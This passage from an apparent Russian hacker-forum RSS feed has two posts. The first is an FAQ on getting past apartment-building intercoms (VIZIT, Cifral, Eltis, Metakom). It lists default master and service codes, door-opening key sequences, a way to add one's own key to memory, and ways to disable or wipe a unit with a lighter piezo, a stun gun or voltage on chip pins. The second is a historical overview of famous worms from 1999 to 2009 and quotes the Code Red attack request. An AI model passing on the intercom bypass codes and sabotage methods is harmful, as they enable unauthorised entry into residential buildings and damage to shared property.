						&lt;p&gt;Q: Как войти в сервисное меню домофона VIZIT? &lt;br /&gt;A: #999-пикнет 2 раза-(мастер код, по умолчанию 1234)-пикнет 1 раз &lt;br /&gt;если код не правильный то пиликнет двух тональным сигналом &lt;br /&gt;значения кнопок: &lt;br /&gt;1 — ??? &lt;br /&gt;2 — Установка индивидуальных кодов для квартир. &lt;br /&gt;3 — Программирование ключей для входа. &lt;br /&gt;4 — Стирание ключей из памяти. &lt;br /&gt;5 — ??? &lt;br /&gt;6 — ??? &lt;br /&gt;7 — ??? &lt;br /&gt;8 — ??? &lt;br /&gt;9 — ??? &lt;br /&gt;* — Выход из режима. &lt;br /&gt;# — Подтверждение установки. &lt;/p&gt;
						&lt;p&gt;Q: Как войти в сервисное меню домофона Eltis? &lt;br /&gt;A: Также как в Cifral. &lt;/p&gt;
						&lt;p&gt;Q: Как войти в сервисное меню домофона МЕТАКОМ? &lt;br /&gt;A: На клаве набирай 65535 В (или #) далее 1234 В (или #) если все нормально то на дисплее появится [ ]. &lt;/p&gt;
						&lt;p&gt;Q: Как на время вывести из строя домофон с ключом-таблеткой? &lt;br /&gt;A: Берем пьезу из электрической зажигалки, и даем разряд в приемник ключа, помогает редко, лучше использовать шокер. &lt;/p&gt;
						&lt;p&gt;Q: Как обнулить память домофона? &lt;br /&gt;A: Для этого надо найти откуда запитан домофон, обычно в щитке на первом этаже, там есть небольшой блок, он обычно очень хорошо спрятан, обнулить его просто дайте на 1, 6, 8 и 12м когу +1,5 вольта а -на 2 ногу и память домофона будет чиста как у младенца. &lt;br /&gt;Но специалист восстановит это за 5 минут. &lt;br /&gt;Также там есть COM-порт, но как его использовать неизвестно. &lt;/p&gt;
						&lt;p&gt;Q: Как открыть дверь домофона Cifral? &lt;br /&gt;A: Если в подъезде есть квартиры с номерами 100, 200, 300, 400 и т.д., то можно попробовать ввести: &lt;br /&gt;звонок 100 звонок 7272 &lt;br /&gt;звонок 200 звонок 7272 &lt;br /&gt;звонок 300 звонок 7272 &lt;br /&gt;звонок 400 звонок 7272 &lt;br /&gt;звонок 500 звонок 7272 &lt;br /&gt;звонок 600 звонок 7272 &lt;br /&gt;звонок 700 звонок 7272 &lt;br /&gt;звонок 800 звонок 7272 &lt;br /&gt;звонок 900 звонок 7272 &lt;br /&gt;звонок 100 звонок 7273 &lt;br /&gt;звонок 200 звонок 7273 &lt;br /&gt;звонок 300 звонок 7273 &lt;br /&gt;звонок 400 звонок 7273 &lt;br /&gt;звонок 500 звонок 7273 &lt;br /&gt;звонок 600 звонок 7273 &lt;br /&gt;звонок 700 звонок 7273 &lt;br /&gt;звонок 800 звонок 7273 &lt;br /&gt;звонок 900 звонок 7273 &lt;/p&gt;
						&lt;p&gt;Q: Как еще можно открыть Cifral? &lt;br /&gt;A: ВЫЗОВ 41 ВЫЗОВ 1410 &lt;br /&gt;Или просто ввести 07054. Иногда помогает. &lt;/p&gt;
						&lt;p&gt;Q: Как можно открыть домофон Eltis? &lt;br /&gt;A: B 100 B 7273 &lt;br /&gt;В 100 В 2323 &lt;br /&gt;Также можно попробовать варианты от Cifral. &lt;/p&gt;
						&lt;p&gt;Q: Как открыть дверь домофона VIZIT? &lt;br /&gt;A: Если стандартные настройки не меняли то *#4230 и дверь откроется. &lt;br /&gt;Еще иногда помогает 12#345. &lt;/p&gt;
						&lt;p&gt;Q: Как войти в системный режим домофона VIZIT? &lt;br /&gt;A: Для входа в системный режим нужно соеденить выводы кабеля «ПРОГРАММИРОВАНИЕ» чаще всего для этого нужно снимать весь блок с двери, потому как данные ваводы не выводят в щиток. &lt;/p&gt;
						&lt;p&gt;Q: Чем отличаются сервисный и системный режим? &lt;br /&gt;A: Сервисный и системный режимы разные. Если снять блок с двери и включить системный режим то можно поменять все. Даже мастер код для входа в системный режим. &lt;/p&gt;
						&lt;p&gt;Q: Как записать в память домофона VIZIT свой ключ? &lt;br /&gt;A: В режиме програмирования нажмите 3, затем номер хаты, приложите ключ, нажмите # а потом * &lt;/p&gt;
						&lt;p&gt;Q: Какие коды по умолчанию ставят в домофоны? &lt;br /&gt;A: 1234, 6767, 3535, 9999, 12345, 0000, 11639 (VIZIT). &lt;/p&gt;
						&lt;p&gt;Q: Как открыть МЕТАКОМ? &lt;br /&gt;A: В сервисном меню нажать 8. Также помогает В (или #) 1234567. &lt;/p&gt;
						&lt;p&gt;Q: Сколько мастер ключей может быть у домофона МЕТАКОМ? &lt;br /&gt;A: Только 1. &lt;/p&gt;
						&lt;p&gt;Q: Можно ли ключи от домофона магнитом убить, или хоть покалечить? &lt;br /&gt;A: Нет, нельзя. &lt;/p&gt;
						&lt;p&gt;Q: Как сменить системный код в домофоне Cifral? &lt;br /&gt;A: В режиме програмирования 1 (p----) и вводи новый пасс. &lt;/p&gt;
						&lt;p&gt;Q: Существуют спец-коды домофонов для открытия дверей спец-службами? &lt;br /&gt;A: Нет, таких кодов нет. &lt;/p&gt;
						&lt;p&gt;Q: Как записать в память домофона Cifral свой ключ? &lt;br /&gt;A: В сервисном режиме нажать 5,затем ввести номер квартиры, домофон напишет TOUCH прикладываем ключ — он в памяти. &lt;/p&gt;
						&lt;p&gt;Q: Как стереть ключ-таблетку из памяти домофона Cifral? &lt;br /&gt;A: В сервисном режиме нажать 5, затем ввести номер квартиры, на которую подключен ключ, затем нажать 9. &lt;/p&gt;
						&lt;p&gt;Q: Как записать в память домофона Cifral оптический (плоский с дырками) ключ? &lt;br /&gt;A: В системном режиме нажать 5, затем ввести номер ячейки ключа (1, 2, 3), вставить ключ, нажать на звонок. &lt;/p&gt;
						&lt;p&gt;Q: Как сменить общий код домофона Cifral? &lt;br /&gt;A: В сервисном меню нажмите 2, затем введите новый код, если код короче 4 цифр, то после ввода нажмите звонок. &lt;/p&gt;
						&lt;p&gt;Q: Как сменить индивидуальный код домофона Cifral? &lt;br /&gt;A: В сервисном меню нажмите 3, затем номер квартиры, звонок, введите новый код, звонок, затем пойдет вызов, абонент должен будет дважды нажать на кнопку звонка. &lt;/p&gt;
						&lt;p&gt;Q: Как отключить абонента домофона Cifral? &lt;br /&gt;A: В сервисном меню нажмите 4, затем 0, затем номер квартиры, затем звонок. &lt;/p&gt;
						&lt;p&gt;Q: Как подключить абонента, которого отключили от домофона Cifral? &lt;br /&gt;A: В сервисном меню нажмите 4, затем 1, затем номер квартиры, затем звонок. &lt;/p&gt;
						&lt;p&gt;Q: Какие настройки по умолчанию домофона Cyfral CCD-2094M? &lt;br /&gt;A: Код доступа в режим изменения параметров и настроек 123456. &lt;br /&gt;Общий код 1234. &lt;br /&gt;Номер таблицы индивидуальных кодов 000. &lt;br /&gt;Номер первого абонента 1. &lt;br /&gt;Кол-во абонентов, подлежащих обслуживанию 100. &lt;br /&gt;Длительность сигнала Z 1. &lt;br /&gt;Режим пользования общим кодом ВКЛ. &lt;br /&gt;Режим пользования индивидуальным кодами ВКЛ. &lt;br /&gt;Абоненты ВКЛ/ВЫКЛ. &lt;br /&gt;в список обслуживания Звуковой сигнал №3. &lt;br /&gt;Оповещение абонента об открывании двери индивидуальным ключом ВКЛ. &lt;/p&gt;
						&lt;p&gt;Q: На домофоне VIZIT клавишь * и # нет, что делать? &lt;br /&gt;A: Есть C и K. С — * K — #. &lt;/p&gt;
						&lt;p&gt;Q: Существует ли системное меню у старых домофонов (с ключом-«палкой»)? &lt;br /&gt;A: Нет. &lt;/p&gt;
						&lt;p&gt;Q: Как еще можно открыть двери домофонов? &lt;br /&gt;A: Попробуйте закоротить лампочку на подъездном освещении, иногда помогает. &lt;br /&gt;Copyright kleoclub.org &lt;br /&gt;Хм но всё равно если знаете больше прошу отпоститься тут!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=PRELIATUS=-)</author>
			<pubDate>Fri, 01 Apr 2011 17:50:42 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=63#p63</guid>
		</item>
		<item>
			<title>10 лучших вирусов</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=62#p62</link>
			<description>&lt;p&gt;История зла 1999-2009&lt;/p&gt;
						&lt;p&gt;САМАЯ НАШУМЕВШАЯ МАЛВАРЬ ЗА ПОСЛЕДНИЕ 10 ЛЕТ&lt;br /&gt;Каждый день — новая зараза. С таким разнообразием всевозможной живности появление новой малвари просто перестаешь замечать. И все-таки, были эпидемии, которые не прошли незамечено. Мы решили вспомнить последние 10 лет и выбрать за каждый год наиболее запомнившуюся заразу.&lt;/p&gt;
						&lt;p&gt;Melissa&lt;/p&gt;
						&lt;p&gt;Едва ли программист из Нью-Джерси задумывался о том, чтобы собрать ботнет из миллионов машин и использовать его для рассылки спама. Вряд ли он мог представить последствия, создавая своего, казалось бы, безобидного червя Melissa. Ведь даже распространение тот начинал не с инета — впервые червь был обнаружен 26 марта в конференции alt.sex внутри Usenet — в то время еще популярной сети для общения и обмена файлами. К сообщению был приложен файл List.DOC, содержащий пароли на 80 порнушных сайтов: позарившись на «клубничку», файлик с радостью открыли многие. А дальше пошло-поехало: червь тут же начал распространение, отправляя себя по 50 первым контрактам из записной книжки пользователя. Это был первый успешный червь, распространяемый через e-mail.&lt;br /&gt;Когда Melissa открывает зараженный документ MS Word 97/2000, запускается специальный макрос, который рассылает копии червя в сообщениях электронной почты при помощи обычного Outlook’а. Для этого червь юзает возможность Visual Basic активизировать другие приложения MS Windows и использовать их процедуры. Вирус вызывает MS Outlook, считывает из адресной книги первые 50 email’ов и посылает по этим адресам сообщения. Написав в мессаге текст аля «Вот документ, о котором ты меня спрашивал», червь приаттачивал к письму текущий открытый документ пользователя, предварительно заражая его. Последнее, кстати, повлекло за собой массу курьезных ситуаций и, в ряде случаев — утечки конфиденциальной информации. В 1999 году пользователи даже не задумывались о том, что в аттаче от известного им адресата может быть какая-то зараза, и активно открывали вложения.&lt;br /&gt;Стремительное распространение вируса серьезно нагрузило почтовые серверы — им пришлось обрабатывать на несколько порядков больше отправлений, чем обычно. Тысячи машин по всему миру не выдержали нагрузки и вышли из строя. К 27 марта распространение вируса приняло характер эпидемии; 29 марта он проник уже на компьютеры всех стран мира, подключенных к Сети, в том числе и на российские.&lt;br /&gt;Найденному силами ФБР Девиду Смиту, который и написал те три десятка строк кода на VB, грозили 10 лет тюрьмы, но парень «легко отделался», получив 20 месяцев заключения и штраф в $5000. Однако исходники червя еще долго мусолили хакеры, плодя различные модификации Melissa.&lt;/p&gt;
						&lt;p&gt;весь код Melissa умещался в 100 строчках&lt;/p&gt;
						&lt;p&gt;Loveletter&lt;/p&gt;
						&lt;p&gt;В следующем году — новая почтовая эпидемия, вызванная вирусом Love Letter (или Love Bug). Письма, содержащие незамысловатое ILOVEYOU в строке темы, посыпались на ничего не подозревавших пользователей градом. И все было бы замечательно, если бы к письму не был приложен скриптик на Visual Basic Script, замаскированный под текстовый файл.&lt;br /&gt;The Subject: ILOVEYOU&lt;br /&gt;Message body: kindly check the&lt;br /&gt;attached LOVELETTER coming from me.&lt;br /&gt;Attached file: LOVE-LETTER-FORYOU.TXT.vbs&lt;br /&gt;На лицо отличный пример социальной инженерии и прием двойного расширения, — что помогло скрыть подлинную природу файла. По умолчанию Винда не показывала второе, настоящее, расширение файла, поэтому принять аттач за обычный текстовик действительно было проще простого. Ну а коль пользователь файл запустил, можно делать свое дело. Написанная с использованием механизма Windows Scripting Host, малварь честно рассылает копии тела по всем адресам из адресной книги почтовой программы MS Outlook, после чего приступает к деструктивной части, закачивая и устанавливая в системе троя. Путь до исполняемого файла прописывался как домашняя страница в параметрах Internet Explorer. Это обеспечивало его автоматическую загрузку, а запуск в системе гарантировал специально созданный ключ в реестре. Далее домашняя страница возвращалась на свое место — и ушастый пользователь даже не замечал изменений. Тем временем, WIN-BUGSFIX.EXE или Microsoftv25.exe честно отправлял автору отснифанные пароли.&lt;br /&gt;Трик с использованием двойного расширения автор заюзал не только в письмах. Для файлов целого ряда расширений, червь создавал свои копии, добавляя к их названию расширение .vbs. Если в папке был файл rulez.mp3, то тут же создавался rulez.mp3.vbs с телом червя — и так повсюду.&lt;br /&gt;В основе другого способа распространения, который так же давал плоды, лежали скрипты для mIRC — самой распространенной программы для бешено популярных тогда IRC-чатов. Пользователям чата автоматически передавалась HTML-ка, предлагающая закачать некий ActiveX-элемент. Что находилось внутри, объяснять не надо, но поверь на слово: посмотреть, что прислал им хороший приятель, соглашались очень многие.&lt;br /&gt;Первый случай активности Love Letter был зафиксирован 4 мая 2000 г., а уже через сутки им были частично или полностью поражены сети ЦРУ, NASA, Министерства энергетики, конгресса США, Пентагона, британской палаты общин и еще множества организаций. Ущерб, нанесенный червем в первые дни активности, был оценен в $5 миллионов. Офигительно? Виновника этого безобразия помог найти оставленный им автограф: «barok -loveletter(vbe) &amp;lt; i hate go to school &amp;gt; by: spyder / ispyder@mail.com / Manila,Philippines». Но в виду отсутствия местных законов за подобные преступления, никакой ответственности он не понес.&lt;/p&gt;
						&lt;p&gt;а вот так выглядело письмо ILOVEYOU&lt;/p&gt;
						&lt;p&gt;Code Red&lt;/p&gt;
						&lt;p&gt;Из-за этого червя сайту Белого дома США в 2002 году пришлось поменять IP-адрес . Стартовавшего 13 июля 2001 года, Code Red интересовали виндовые машины с запущенным веб демоном IIS на борту и включенной системой индексирования. О существовании критической уязвимости, приводящей к переполнению буфера, в Microsoft знали задолго до появления вируса, а за месяц до эпидемии была опубликована заплатка. Впрочем, это не помешало запущенному 13 июля червю заразить за 6 следующих дней более 350 тысяч машин. Брешь в ISS позволяла легко выполнять на сервере удаленный код. Разработчики Code Red не сильно заморачивались и приделали эксплоит к простейшему сканеру, который работал «в лоб». Во время сканирования Code Red не проверял наличие IIS на новом компьютере-жертве, а тупо отправлял специально сформированные HTTP-запросы на сгенерированные случайно IP-адреса в надежде, что где-то на 80-порту окажется вожделенный IIS. Море запросов— огромный объем трафика. В итоге, оборудование попросту стало задыхаться от мусорных GET-запросов, которые генерировали ноды по всему мира. В логах Apache, на который, естественно, уязвимость IIS не распространялась, можно было обнаружить подобные строки:&lt;br /&gt;GET /default.ida?NNNNNNNNNNNNNNNNNN&lt;br /&gt;NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN&lt;br /&gt;NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685&lt;br /&gt;8%ucbd3%u7801%u9090%u6858%ucbd3%u7&lt;br /&gt;801%u9090%u6858%ucbd3%u7801%u9090%&lt;br /&gt;u9090%u8190%u00c3%u0003%u8b00%u531&lt;br /&gt;b%u53ff%u0078%u0000%u00=a HTTP/1.0&lt;br /&gt;В процессе работы Code Red не использовал никаких временных или постоянных файлов. Червь уникален: он существовал либо в системной памяти зараженных компьютеров, либо в виде TCP/IP-пакета при пересылке на удаленные машины. Но наличие заразы на сервере обнаруживалось без всякого антивируса. Поскольку в памяти компьютера могли существовать сразу сотни активных процессов Code Red, то тормоза и лаги были неизбежны. Червь заменял содержимое страниц на зараженных серверах на сообщение: «HELLO! Welcome to &lt;a href=&quot;http://www.worm.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.worm.com&lt;/a&gt;! Hacked By Chinese!», но был избирателен и дефейсил только те системы, где в качестве основного языка был установлен английский.Через некоторое время, правда, дефейс снимался автоматически: видимо, разработчики не хотели раньше времени терять драгоценную ноду.&lt;br /&gt;Между 20 и 28 числами месяца тело червя должно было начать DoS-атаку на несколько IP-адресов, один из которых принадлежал американскому Белому дому.&lt;br /&gt;В августе этого же года начал распространяться новый червь Code Red II, код которого, несмотря на схожее название, был создан заново и предоставлял владельцам полный контроль над зараженными машинами, копируя файл cmd.exe в каталог \inetpub\scripts\ ISS-сервера. В отличие от оригинального Code Red, клон старался атаковать хосты в той же подсети и не допускал одновременного запуска себя на одной системе.&lt;/p&gt;
						&lt;p&gt;Code Red дефейсил системы с английской локалью&lt;/p&gt;
						&lt;p&gt;Nimda&lt;/p&gt;
						&lt;p&gt;Запустившегося в сентябре 2001 года червя ну никак не могли не связать с деятельностью Алькайды, заодно рассказывая о мощных технологиях, применяемых в новой заразе. Но если присказки о терроризме были выдумкой журналистов, то очевидная продвинутость нового червя была на лицо. Фишка Nimda заключалась сразу в нескольких каналах распространения, благодаря которым ему удалось в считанные минуты распространиться по Сети. Разберемся по порядку.&lt;br /&gt;1. Наибольший пробив был получен за счет эксплоита, который использовал уязвимость в Internet Explore’е, позволяющую автоматически запускать приаттаченный к письму файл. Прикрепленный к письму README.EXE (написаный, кстати, на С++) беспрепятственно запускался на машине при простом открытия письма, и комфортно начинал свое распространение. Причем, для поиска новых адресатов вирус кропотливо сканировал текстовые документы на жестком диске, а также запрашивал с помощью специальной MAPI-функции список адресатов с сервера Microsoft Exchange.&lt;br /&gt;2. Другой способ распространения — расшаренные ресурсы в локалке. После сканирования всех доступных шар Nimda создавал там файлы с почтовыми сообщениями, имеющие расширение .EML и .NWS.Открытие таких файлов происходит в почтовой программе, что автоматически влекло за собой заражение, как если бы письмо просто пришло по почте.&lt;br /&gt;3. Не могли забыть создатели и про дырявый IIS, уязвимость в котором уже использовали другие черви. Поэтому Nimda довольно эффективно пробивал майкросовский веб-демон с помощью уязвимости directory traversal. В случае заражения веб-сервера на нем случайным образом выбирались странички, откуда начиналась загрузка вируса посетителям.&lt;br /&gt;4. И еще интересный ход — Nimda не стеснялся и активно использовал для распространения бекдоры, оставленные в системах червями Code Red II и sadmind/IIS.&lt;br /&gt;Добавим, что Nimda имел опасный побочный эффект, который мог допустить утечку конфиденциальной информации с зараженных компьютеров. Червь добавлял пользователя под именем «Guest» в группу пользователей «Администраторы». Таким образом, обычные гости получали полный доступ к ресурсам компьютера. Более того, все локальные диски открывались через шары для полного доступа.&lt;br /&gt;Автор этого вируса официально не найден, но в теле червя содержится строка, указывающая, что создатель из Китая: «Concept Virus(CV) V.5, Copyright(C)2001 R.P.China»&lt;/p&gt;
						&lt;p&gt;разные способы заражения червя Nimda&lt;/p&gt;
						&lt;p&gt;Slammer&lt;/p&gt;
						&lt;p&gt;Незадачливые жители стран Северной Америки были сильно удивлены, когда 25 января многие банкоматы попросту перестали работать. Во всем мире со сбоями работали службы по заказу и резервированию авиабилетов, многие сервисы вообще не были доступны. Но набивший оскомину финансовый кризис тут вовсе не причем — это лишь всплеск активности червя Slammer. Активность впервые замечена в 12:30 по среднеатлантическому времени, а к 12:33 количество зараженных машин удваивалось каждые 8.5 секунд.&lt;br /&gt;В основе червя лежала уязвимость в Microsoft SQL Server, концепция которой была представлена David Litchfield на конференции BlackHat. Отправляя на 1434 скомпрометированный пакет, вирус мог выполнить на удаленной машине произвольный код и, в свою очередь, продолжить распространение. По различным отчетам сообщается, что вирусу удалось заразить 75.000 машин за каких-то десять минут, — но как? Уязвимый модуль IIS, позволяющий приложениям автоматически обращаться к нужной базе данных, принимал запросы как раз по UDP, а тело вируса, составляющее всего 376 байт, отлично помещалось в один единственный UDP-пакет. В результате Slammer не использовал тормозной TCP, требующий постоянных квитков-подтверждений, а рассылал себя по ненадежному UDP со скоростью несколько десятков запросов в секунду! Несмотря на то, что патч для уязвимости был выпущен за 6 месяцев до эпидемии, а вирус никак не проявлял себя на зараженной машине, последствия от Slammer’а были колоссальными. Роутеры и маршрутизаторы на магистралях были настолько перегружены трафиком, что лавинообразно выбивали другу друга в конце концов отключив некоторые бэкбоны. Южная Корея была полностью отрублена от инета и находилась в таком состоянии почти 24 часа. Только представь: никакого интернета и мобильной связи с внешним миром для 27 миллионов человек. Забавно, что многие жертвы даже не знали, что на их машине установлена такая специфическая вещь, как SQL.&lt;/p&gt;
						&lt;p&gt;сетевая активность Slammer&#039;a&lt;/p&gt;
						&lt;p&gt;Sasser&lt;/p&gt;
						&lt;p&gt;Уж что-что, а окошко System Shutdown, инициированное NT AUTHORITY\SYSTEM с обратным отсчетом и сообщением о принудительной перезагрузке компьютера видел почти каждый — годом ранее, во время эпидемии Blaster’а, либо же в 2004, когда стал бушевать во многом похожий на него Sasser. Принципиальная разница червей в том, что они используют критические уязвимости в разных службах. Для размножения Sasser использует баг переполнения буфера в службе Local Security Authority Subsystem Service (LSAS) — отсюда и название червя. Написанное на С++ тело Sasser в первоначальной версии открывает 128 параллельных потоков, и, используя специальный алгоритм по генерации IP-адресов, пытается найти системы с незащищенным 445 портом и уязвимым сервисом. Сплоит работал на «ура», правда, приводил к ошибке на системе пользователя. Sasser открывал на 9997 порту шелл, через который далее и заливалось все необходимое. Само тело червя без лишнего геморроя просто передавалось по протоколу через FTP, причем сервер также открывался на зараженных компьютерах на 5554 порту. Как часто бывает, шелл-код сплоита отличается от системы к системе, поэтому Sasser предварительно проверял версии удаленной системы, чтобы выбрать правильный набор параметров для атаки.&lt;br /&gt;Оригинальная версия червя Sasser распространялась достаточно медленно, но через несколько дней в Сети были выпущены модификации, распространяющиеся гораздо быстрее. К этому моменту число зараженных машин измерялось сотнями тысяч, а в пике эпидемии речь шла о миллионах. В Финляндии были отменены рейсы местной авиакомпании, во многих странах закрыты некоторые отделения крупнейших банков. Автором заразы оказался 18-летний немецкий студент Свен Яшан, хотя изначально разрабатывался «русский след». Юного вредителя заложил кто-то из своих, позарившись на обещанное Microsoft’ом награждение в 250.000 баксов. Помимо Sasser, на компьютере парнишки нашли еще и многочисленные модификации червя Netsky.&lt;/p&gt;
						&lt;p&gt;ошибка системы после заражения Sasser&#039;om&lt;/p&gt;
						&lt;p&gt;Sony rootkit&lt;/p&gt;
						&lt;p&gt;Забавный факт: это единственный руткит, который распространялся легально! Win32/Rootkit.XCP, или «sony rootkit», является частью системы защиты аудио-CD,выпускаемых Sony BMG. Растроенная всепоглощающим пиратством компания решила бороться с нелегальным копированием с помощью DRM-компонентов (Digital Rights Management), а в попытке скрыть их присутствие в системе обратилась в компанию First 4 Internet, чтобы те написали маскирующий руткит. В итоге, система защиты дисков вместе с руткитом стала инсталлироваться на компьютер пользователя автоматически, когда в привод вставляется защищенный компакт диск. После установки, в системе появлялись два новых сервиса, которые и выполняли все функции. Установленный драйвер $sys$aries (aries.sys) скрывает все файлы и ключи в реестре, которые начинаются с «$sys$» посредством перехвата нативных API-функций. Win32/Rootkit.XCP отслеживает обращения к System Service Table (SST) и перехватывает обращения к функциям: NtCreateFile, NtEnumerateKey, NtOpenKey, NtQueryDirectoryFile, NtQuerySystemInformation. В результате удается скрыть присутствие ключей в реестре, папок, файлов и процессов.&lt;br /&gt;Ты спросишь: а в чем, собственно, трабл? Ну, скрывает этот руткит работу нужных ему компонентов, что с того? Очень просто. Сразу после появления руткита, Марк Руссинович в своем блоге рассказал о многочисленных брешах в собственной защите программы. И был прав: очень скоро механизм, предназначенный для сокрытия файлов и процессов, быстро приспособили для своих нужд кодеры вирусов. Более того, распространение этого ноу-хао само по себе приводило к нестабильности системы, зависанию компьютера и потере данных из-за кривых драйверов, установленных в систему. И даже тогда, когда Sony выпустила специальную тулзу, избавиться от это дряни полностью было очень и очень затруднительно.&lt;/p&gt;
						&lt;p&gt;BSOD из-за корявых драйверов Sony rootkit&lt;/p&gt;
						&lt;p&gt;Warezov&lt;/p&gt;
						&lt;p&gt;На дворе — 2006 год, только вот ушастые пользователи по-прежнему открывают все вложения в письмах, а программно им мало кто запрещает это делать. Результат? Огромный ботнет Warezov (он же Stration), который авторы сумели собрать за счет одноименного червя, рассылаемого по email. Никаких сплоитов и уязвимостей, — социальная инженерия и людская тупость. И ведь повсю трубят: «Не открывай вложений» — так ведь все равно кликают. Особенность червя Warezov — в огромном количестве вариаций, которые появлялись, как грибы после дождя. Был момент, когда новые модификации появлялись чуть ли не раз в 30 минут. Даже с обновленными антивирусными базами многие юзеры оставались не у дел. Впоследствии, когда на веб-серверах глобально начали вычищать все письма со зловредными аттачами, модификации перекинулись на IM-сети. А один из вариантов Warezov стал первым червем, который распространялся через Skype!&lt;br /&gt;Как и подобает трою для ботнета, тело Warezov позволяло владельцам загрузить на компьютер любую заразу. Червь содержит в себе список жестко прописанных URL-адресов (что, конечно, минус), которые он проверяет на наличие файлов. В случае если по какому-либо из этих адресов будет размещен файл, он загрузится в систему и запустится. Основной модуль Warezov способен завершать различные процессы, а также останавливать и удалять службы антивирусных программ и персональных брандмауэров. Для организации рассылки червь использует собственный SMTP-сервер. Главное использование ботнета — это, конечно же, спам. Однако многие ноды служили для хостинга так называемых fast-flux платформ, позволяя спамерам прятать настоящее расположение их спамерских сайтов за IP-адресом жертвы. IP менялся настолько часто, что его невозможно было прикрыть. Warezov достигал этого двумя средствами: во-первых, reverse HTTP proxy, которая получала контент с настоящего (скрываемого) сайта, а также DNS-сервера, на котором специальная версия Bind под Windows меняла записи по нужному алгоритму.&lt;/p&gt;
						&lt;p&gt;временный файл Warezov&lt;/p&gt;
						&lt;p&gt;Storm&lt;/p&gt;
						&lt;p&gt;Ботнет, созданный с помощью червя Storm, можно смело назвать произведением искуства. Децентрализованная P2P-сеть, в которой большинство хостов сидит тихо и ждет указаний. Доменные имена разрешаются в постоянно меняющиеся IP-адреса (опять же fast-flux domains). Часть кода червя — полиморфная. В пике — более миллиона инфицированных хостов. Как это удалось?&lt;br /&gt;Эпидемия червя началась с компьютеров в Европе и Соединенных Штатах 19 января 2008 года, когда, прикрываясь темой урагана в Европе, пользователям повалились письма с предложением открыть вложенный файл с названиями Full Clip.exe, Full Story.exe, Read More.exe или Video.exe.&lt;br /&gt;Все попавшиеся на удочку машины автоматически объединялись в ботнет, но в отличие от других сетей, он не использовал специальный управляющий сервер, доступ к которому легко перекрыть. Принцип управления Storm больше напоминает пиринговую сеть, в которой зараженные ноды подключаются к своему управляющему хосту (он руководит обычно 30-45 зомби), а хосты взаимодействуют между друг другом. Причем роль хоста в случае необходимости может занять любая из нод. Вся сеть устроена так, что полного списка нодов нет ни у кого, поэтому точные размеры ботнета так и остались загадкой. По разным подсчетам, он варьировался от одного до нескольких миллионов машин.&lt;br /&gt;Помимо функций по работе с ботнетом, Storm устанавливает в системе руткит: Win32.agent.dh, посредством которого держатели ботнета могли стащить любую конфиденциальную инфу, рассылать спам и устраивать мощные DDoS-атаки.&lt;/p&gt;
						&lt;p&gt;техника fast-flux в картинках&lt;/p&gt;
						&lt;p&gt;Merboot&lt;/p&gt;
						&lt;p&gt;Загрузочные вирусы, о которых все благополучно успели забыть, возвращаются. В 2005 году на хакерской конференции Black Hat специалисты eEye Digital Security продемонстрировали концепт так называемого буткита, размещающего в загрузочном секторе диска код, который перехватывает загрузку ядра Windows и запускает бэкдор с возможностью удаленного управления по локальной сети. Презентация прошла на ура, а в 2008 году, после длительного затишья в области руткитов, выстрелил Mebroot. Новый троян использовал представленную еще в 2005 году идею и размещал свое тело в бут-секторе диска, после чего вносил модификации в ядро Винды, которые затрудняли обнаружение вредоносного кода антивирусами. Подцепить заразу мог кто угодно: компы заражались через свежие сплоиты с популярных сайтов. Вредоносный код сначала изменяет MBR (главная загрузочная запись), записывает руткит-части в сектора диска, извлекает из себя и устанавливает бэкдор в Windows, после чего самоудаляется. В результате заражения, в MBR размещаются инструкции, передающие управление основной части руткита, размещенного в разных секторах жесткого диска. Именно эта часть, уже после загрузки системы, перехватывает API-функции и скрывает зараженный MBR. Кроме традиционных функций по сокрытию своего присутствия в системе, вредоносный код устанавливает в Windows бэкдор, который занимается кражей банковских аккаунтов.&lt;/p&gt;
						&lt;p&gt;с Merboot&#039;om до сих пор справляются далеко не все антивирусы&lt;/p&gt;
						&lt;p&gt;Downadup&lt;/p&gt;
						&lt;p&gt;Червя, нашумевшего в январе, называют по-разному: Downadup, Conficker, Kido. Важно одно: новой малваре за несколько дней удалось заразить миллионы компьютеров, и собранный ботнет функционирует до сих пор. Разработчикам удалось лихо диверсифицировать способы распространения, объединив в одном черве сразу несколько успешных методик. Самый эффективный способ — приватный сплоит, использующий непропатченную систему с уязвимостью переполнения буфера MS08-067 в сервисе «Сервер» (патч вышел еще в октябре). Для этого червь отсылает удаленной машине специальным образом сформированный RPC- запрос, вызывающий переполнение буфера при вызове функции wcscpy_s в библиотеке netapi32.dll. На компьютере запускается специальный код-загрузчик, который скачивает с уже зараженной машины исполняемый файл червя и запускает его.&lt;br /&gt;Кроме этого, червь отлично тиражирует себя через «Сетевое окружение», перебирая пароль администратора к системной шаре ADMIN$. А давно известный способ распространения через флешки претерпел изменения: в результате обфускации Autorun.inf (разработчики просто добавили в файл кучу мусора) удалось обмануть многие сигнатурные антивирусы. Несколько способов = максимальный эффект! Другая ключевая особенность заключается в том, как червь скачивает на зараженную машину трояна (для дальнейшей рассылки вируса, DDoS’а и т.д.). Разработчики отказались от размещения файлов на каком-то жестко зафиксированном серваке. Вместо этого код червя получает на нескольких популярных ресурсах текущую дату и по ней генерирует список из 250 доменов, используя специальный алгоритм. Задача хозяев ботнета — заблаговременно эти домены зарегистрировать и разместить там файлы для загрузки. Противостоять этому не столько сложно, сколько дорого.&lt;br /&gt;Перехватывая API-вызовы, отвечающие за обращение к DNS, заразе долгое время удавалось сдерживать антивирусы, которые банально не могли обновиться, обращаясь к заблокированным доменам, содержащим слова kaspersky, nod, symantec, microsoft и т.д.&lt;/p&gt;
						&lt;p&gt;разные способы распространения червя Downadup&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=PRELIATUS=-)</author>
			<pubDate>Fri, 01 Apr 2011 17:47:49 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=62#p62</guid>
		</item>
		<item>
			<title>На чём прокалываются хакеры</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=61#p61</link>
